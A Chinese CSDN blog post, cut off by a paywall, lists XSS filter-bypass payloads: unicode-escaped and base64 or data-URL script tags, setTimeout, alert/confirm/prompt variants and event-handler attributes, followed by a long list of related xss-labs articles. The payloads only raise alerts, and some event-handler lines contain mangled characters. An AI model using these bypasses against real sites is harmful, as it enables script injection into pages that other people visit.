XSS----一些方法

最新推荐文章于 2024-06-17 10:15:54 发布
最新推荐文章于 2024-06-17 10:15:54 发布
阅读量1.1k 收藏 3
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bylfsj/article/details/100747587
版权

参考https://blog.csdn.net/qq_29277155/article/details/51320064

0x01.标签绕过

1 script篇

方法:

1.1 ascii标识符

<script>\u0061\u006C\u0065\u0072\u0074(88199)</script>

1.2…标签的src属性---------dataurl 协议

 <script src=data:text/javascript,alert(88199)></script>
    
<script src=&#100&#97&#116&#97:text/javascript,alert(88199)></script>

<script src=data:text/html;base64,YWxlcnQoMSk=></script>

base64-----------alert(1)

1.3.String.fromCharCode

1.4.setTimeout

## <script>setTimeout(alert(88199),0)</script>

1.5.普通方式

<script>alert(navigator.userAgent)<script>
<script>alert(88199)</script>
<script>confirm(88199)</script>
<script>prompt(88199)</script>

<script>+alert(88199)</script>
<script>alert(/88199/)</script>

<script>alert(/88199/.source)</script>

0x02、a标签运用

1.事件

<anytag οnmοuseοver=alert(15)>M
<anytag οnclick=alert(16)>M
<a οnmοuseοver=alert(17)>M
<a οnclick=alert(18)>M

2.href属性

最低0.47元/天 解锁文章
bylfsj
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xss-labs靶场
newlife1441的博客
07-29 810
靶场搭建,可以从Github上下载或者直接下载下面的资源入门级别的xss-labs靶场,有需要的自行下载搭建,搭建过程可以参考网上的资料-网络安全文档类资源-CSDN下载入门级别的xss-labs靶场,适合新入门的学生进行练习,希望你可以从中学习到一些解题的相关技巧和关更多下载资源、学习资料请访问CSDN下载频道.https。......
xss-labs.zip
03-18
3. 防御XSS:学习如何使用输入验证、输出编码、HTTPOnly Cookie等方法来防止XSS攻击。 4. 模拟攻击:尝试在实验室环境中模拟真实世界中的XSS攻击,理解其危害。 每个子文件可能代表一种特定的XSS场景,通过解决这些...
XSS-labs详解
ytdd66的博客
03-23 2023
进入靶场点击图片,开始我们的XSS之旅!
xss-lab通关之路
黑白的博客
10-12 4509
xss-lab通关之路
XSS、CSRF、点击劫持、web应用安全实施
zzz6583zz的博客
06-17 427
如果放cookie要配置上httponly和secure属性,这样就防止了xss,同时其他的同源策略要多多考虑。如果选择其他方式,就要着重考虑防止xss。必须使用csrf-token,使用cookie存储,使用httponly和secure属性。每个域名入口必须配置指定域能跨域,不能写通配符。响应的html内容必须加上csp策略(响应头和meta标签形式均可),只允许本源或指定源,配置不允许内联脚本、内联css。
xss-labs
Yb_140的博客
03-26 1537
xss-labs下载地址:GitHub - do0dl3/xss-labs: xss 跨站漏洞平台 目录 level1 level2 level3 level4 level5 level6 level7 level8 level9 level10 level11 level12 level13 level14 level15 level16 level17 level18 level19 level20 level1 猜测使用GET传参,将name显示在
Web 安全之 X-XSS-Protection 详解_request payload x-xss-protection
2401_84267585的博客
05-04 618
X-XSS-Protection 是一个旨在启用或配置某些版本的 Internet Explorer、Chrome 和 Safari 的内置跨站脚本 (XSS) 过滤器的 HTTP 响应头,这个过滤器的目的是通过检测响应中的反射性 XSS 攻击并阻止页面加载,从而保护用户免受攻击。X-XSS-Protection 响应头最早由 Microsoft 引入到 Internet Explorer 8 中,用于控制浏览器的 XSS 过滤器。随后其他浏览器厂商也在一定程度上实现了这一功能。
XSS注入之xss-labs
m0_60716947的博客
05-02 3378
(一)配置环境 (1)phpstudy 的安装 这里可以去看看我写的另外一个文章 SQL注入之sqli-labs_清丶酒孤欢ゞ的博客-CSDN博客 这里面详细的讲了phpstudy的安装与搭建。 (2)xss-labs 的安装 mirrors / do0dl3 / xss-labs · GitCode 点击克隆里面的下载源码,随便选一个形式,然后将文件解压到 phpstudy 下的www 目录下 打开 phpstudy 中的 apache ,在浏览器中输入 127.0.0.1/xss-lab
XSS-lab通关记录
zjnu_y3s的博客
04-11 2144
本文章为buuctf basic XSS-lab的通关记录,为个人学习记录,仅供参考 在学习xss-lab之前,先了解了一下xss攻击的原理,如下: 简述 人们经常将跨站脚本攻击(Cross Site Scripting)缩写为CSS,但这会与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。因此,有人将跨站脚本攻击缩写为XSS。 跨站脚本攻击(XSS),是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则.
Web 安全之 X-XSS-Protection 详解
路多辛的所思所想
11-27 1782
跨站脚本(XSS)是一种常见的网络攻击,攻击者通过在网站中插入恶意脚本,当用户访问被污染的页面时,恶意脚本会被执行,从而窃取用户的敏感信息、篡改页面内容或者执行其他恶意操作。XSS 攻击分为三种类型:持久型、DOM-based 型和反射型 XSS(非持久型)。持久型 XSS:攻击者在网页中插入恶意脚本,并将其保存到服务器或数据库中。当其他用户访问该页面时,恶意脚本会被执行,从而进行长期的网络攻击。这种类型的攻击比较危险,因为可以长期地影响用户。
xss-labs 通关教程
SkyWT 的博客
07-05 1645
XSS 攻击历久弥新,目前 XSS 漏洞依然广泛存在。其核心在于找到注入点并通过 payload 让浏览器执行 js 代码。注入点不仅可以来源于用户提供的文本(请求参数或后端存储的字段),也可以是 Referer、UA、Cookie 等。通过<script>标签。通过元素的 onmouseover 属性。通过<img>的 onerror 属性,如。通过 URI,如。一般来说,使用 PHP 的函数能够防御很大一部分 XSS(注意过滤单引号)。许多字符过滤上的漏洞都是没有使用。
xss-labs-master过关心得
Ays.Ie的博客
11-03 1821
xss-labs-master通关心得
xss-labs靶场通关
10-13
xss-labs靶场通关 本篇文章将对xss-labs靶场的六关...xss-labs靶场的六关源码展示了xss攻击的多种形式和方法,每一关都有其独特的攻击方式和payload,了解这些攻击方法和payload是非常重要的,以便更好地防止xss攻击。
lucy-xss-filter
04-30
如果将过滤器与白名单方法一起使用,它将为XSS攻击的网站提供比使用黑名单方法的现有过滤器更严格的安全措施。 同时支持DOM和SAX解析器。XssPreventer 使用apache-common-lang3库防止XSS攻击。 只需按如下所示转换...
xss-lab全通关教程
05-07
这份教程包含了20个不同的挑战关卡,旨在逐步引导学习者掌握XSS的各种类型和防范方法。 首先,我们要理解XSS的三种主要类型:反射型XSS、存储型XSS和DOM型XSS。反射型XSS是通过诱使用户点击含有恶意代码的链接来...
方案-基于云架构的校园信息化建设方案.pdf
最新发布
07-29
方案-基于云架构的校园信息化建设方案.pdf
【创新未发表】Matlab实现蛇群优化算法SO-Kmean-Transformer-LSTM负荷预测算法研究.rar
07-29
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
【创新未发表】Matlab实现北方苍鹰优化算法NGO-Kmean-Transformer-LSTM组合状态识别算法研究.rar
07-29
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
【创新未发表】Matlab实现蝗虫优化算法GOA-Kmean-Transformer-BiLSTM组合状态识别算法研究.rar
07-29
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
X-XSS-Protection
07-28
- *1* *2* [防XSS注入方法](https://blog.csdn.net/weixin_45382656/article/details/103765012)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值